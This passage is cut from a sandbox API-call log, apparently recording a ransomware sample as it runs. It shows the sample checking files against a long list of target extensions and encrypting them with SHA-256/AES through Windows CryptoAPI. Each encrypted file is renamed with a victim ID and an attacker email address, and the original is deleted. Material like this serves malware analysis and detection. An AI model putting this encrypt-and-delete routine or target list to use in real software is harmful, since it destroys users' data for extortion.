dc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".bmp") returned=".bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0176.624] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.624] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.624] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0176.633] ReadFile (in: hFile=0x388, lpBuffer=0x24e3020, nNumberOfBytesToRead=0x93038, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0x24e3020*, lpNumberOfBytesRead=0x18b350*=0x93038, lpOverlapped=0x0) returned 1
	[0176.692] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.692] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb220) returned 1
	[0176.695] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.695] CryptCreateHash (in: hProv=0xfcb220, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0176.695] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.695] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0176.695] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.696] CryptDeriveKey (in: hProv=0xfcb220, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9430) returned 1
	[0176.696] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.696] CryptEncrypt (in: hKey=0xfb9430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x93038, dwBufLen=0x93038 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x93040) returned 1
	[0176.701] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.702] RtlMoveMemory (in: Destination=0x290b020, Source=0x24e3020, Length=0x93038 | out: Destination=0x290b020) 
	[0176.716] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.717] CryptEncrypt (in: hKey=0xfb9430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x290b020*, pdwDataLen=0x18aefc*=0x93038, dwBufLen=0x93040 | out: pbData=0x290b020*, pdwDataLen=0x18aefc*=0x93040) returned 1
	[0176.737] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.737] CryptDestroyKey (hKey=0xfb9430) returned 1
	[0176.738] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.738] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0176.738] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.738] CryptReleaseContext (hProv=0xfcb220, dwFlags=0x0) returned 1
	[0176.738] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.738] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0176.739] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.739] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0176.740] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 102
	[0176.740] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0176.741] WriteFile (in: hFile=0x390, lpBuffer=0x290b020*, nNumberOfBytesToWrite=0x93040, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x290b020*, lpNumberOfBytesWritten=0x18b358*=0x93040, lpOverlapped=0x0) returned 1
	[0176.789] CloseHandle (hObject=0x390) returned 1
	[0176.789] CloseHandle (hObject=0x388) returned 1
	[0176.789] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp")) returned 1
	[0176.822] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp")) returned 0
	[0176.822] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1518, dwReserved0=0x0, dwReserved1=0x0, cFileName="guest.png", cAlternateFileName="")) returned 1
	[0176.822] lstrcmpW (lpString1="guest.png", lpString2="..") returned 1
	[0176.842] lstrcmpW (lpString1="guest.png", lpString2=".") returned 1
	[0176.842] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\"
	[0176.842] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpString2="guest.png" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.png") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.png"
	[0176.842] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.png") returned 60
	[0176.842] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.842] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.png", cchLength=0x3c | out: lpsz="c:\\users\\all users\\microsoft\\user account pictures\\guest.png") returned 0x3c
	[0176.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.843] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\guest.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0176.843] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\user account pictures\\guest.png" | out: lpString1="c:\\users\\all users\\microsoft\\user account pictures\\guest.png") returned="c:\\users\\all users\\microsoft\\user account pictures\\guest.png"
	[0176.843] lstrlenW (lpString="c:\\users\\all users\\microsoft\\user account pictures\\guest.png") returned 60
	[0176.843] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.844] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0176.844] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.844] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0176.844] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.845] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.845] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\guest.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0176.845] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x1518, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x1518, lpOverlapped=0x0) returned 1
	[0176.850] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.850] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcba18) returned 1
	[0176.852] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.853] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0176.853] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.853] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0176.853] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.853] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb90f0) returned 1
	[0176.853] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.854] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x1518, dwBufLen=0x1518 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x1520) returned 1
	[0176.854] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.855] RtlMoveMemory (in: Destination=0xfde6a0, Source=0xfdd180, Length=0x1518 | out: Destination=0xfde6a0) 
	[0176.855] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.855] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfde6a0*, pdwDataLen=0x18aefc*=0x1518, dwBufLen=0x1520 | out: pbData=0xfde6a0*, pdwDataLen=0x18aefc*=0x1520) returned 1
	[0176.856] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.856] CryptDestroyKey (hKey=0xfb90f0) returned 1
	[0176.856] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.856] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0176.856] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.857] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0176.857] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
